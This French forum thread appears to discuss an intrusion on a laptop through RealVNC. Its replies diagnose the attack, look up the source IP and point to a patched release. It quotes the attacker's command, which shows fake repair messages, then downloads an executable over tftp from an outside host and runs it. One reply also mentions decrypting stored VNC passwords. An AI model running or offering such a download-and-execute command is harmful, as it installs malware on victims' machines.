Hacking d'un PC portable avec VNC

[ekivok44]

Bonjour,

ma copine était sur mon PC portable boulot sur lequel il y a VNC server. la souris s'est mise a bouger toute seule. j'ai directement tué la connection. néanmoins, il a lancé cette commande la a partir de "executer" :

Code: Tout sélectionner

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 75.16.107.121 GET amnbwsh.exe & start amnbwsh&


ça veut dire quoi pour vous?

merci

[TheHinou]

Code: Tout sélectionner

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 75.16.107.121 GET amnbwsh.exe & start amnbwsh&

comspec /c démarre une nouvelle instance d'un interpreteur de commande et execute les commande passer par une chaine de caractère .

echo repairing user32.dll : c'est juste un affichage d'une gentille phrase bidon
echo Please wait... : juste another phrase bidon.


tftp -i 75.16.107.121 GET amnbwsh.exe & start amnbwsh <-- la c'est plus grave il a fait télécharger un exe et il l'a lancé ....

Donc tu peux en déduire ce que tu veux mais moi a mon avis y'a un mec qui a essayer de t'installer un troyen ... ou une autre cochonnerie.

Si tu n'as pas de mdp sur ton vnc je t'inviterais a en mettre un sinon si tu en as un je t'invite a ne pas laisser ta base de registre consultable à distance

[raybones]

Code: Tout sélectionner

CustName:   PPPoX Pool - rback6.crchtx 1035 051006
Address:    Private Address
City:       Plano
StateProv:  TX
PostalCode: 75075
Country:    US
RegDate:    2006-05-10
Updated:    2006-05-10

NetRange:   75.16.96.0 - 75.16.111.255
CIDR:       75.16.96.0/20
NetName:    SBC07501609600020060510104257
NetHandle:  NET-75-16-96-0-1
Parent:     NET-75-0-0-0-1
NetType:    Reassigned
Comment:    Abuse contact abuse@swbell.net, Technical contact noc@sbcis.sbc.com
RegDate:    2006-05-10
Updated:    2006-05-10

OrgAbuseHandle: ABUSE6-ARIN
OrgAbuseName:   Abuse - Southwestern Bell Internet
OrgAbusePhone:  +1-800-648-1626
OrgAbuseEmail:  abuse@sbcglobal.net

OrgNOCHandle: SUPPO-ARIN
OrgNOCName:   Support - Southwestern Bell Internet Services
OrgNOCPhone:  +1-800-648-1626
OrgNOCEmail:  support@swbell.net

OrgTechHandle: IPADM2-ARIN
OrgTechName:   IPAdmin-SBIS
OrgTechPhone:  +1-800-648-1626
OrgTechEmail:  ipadmin@att.com

[ekivok44]

mais j'ai un mot de passe sur mon VNC de 7 caractères!!!
de plus j'étais en 56k donc j'ai eu le temps de réagir.

Pour le TFTP, j'avais bien compris qu'il essayé d'installer un programme a partir de son PC via un serveur TFTP. De plus dans l'observateur d'événement il y a bien une connexion via la meme IP que le TFTP. par contre il n'est pas passé par le port 5900... étrange. il est passé par le port 3972.

comment ils a réussi a avoir mon mot de passe VNC? il y a une faille dans VNC?

[TheHinou]

Le mot de passe VNC est stocker dans la base de registre en crypté mais bon t'as des prog pour les décrypter.

J'en ai utiliser un, une fois sur une machine en lan qui après une manipulation stupide avait perdu les driver usb donc plus de clavier ni de souris ... et comme le mdp VNC était inconnu j'ais récupérer le mdp crypter via un script vbs, utiliser le prog et en moins de 3 mins j'avais le mdp

http://www.governmentsecurity.org/archive/t12186.html

Donc pour peu que t'ais ta base de registre accessible a distance ... ou alors tu utilises une version non securisé

http://www.digg.com/software/VNC_hack_t ... t_password

[ekivok44]

j'utilise REALVNC, le firewall XP activé, et le PC branché en direct via une connexion RTC afin de faire une connexion CIsco VPN a mon entreprise

[TheHinou]

Mets à jour ton realvnc ... c'est justement une des rare version où des explois d'acces sans utilisation de mot de passe est faisable

[Koj]

VNC Personal Edition 4.2.3

General changes : FIXED: Security vulnerability

http://www.realvnc.com/products/persona ... notes.html

Koj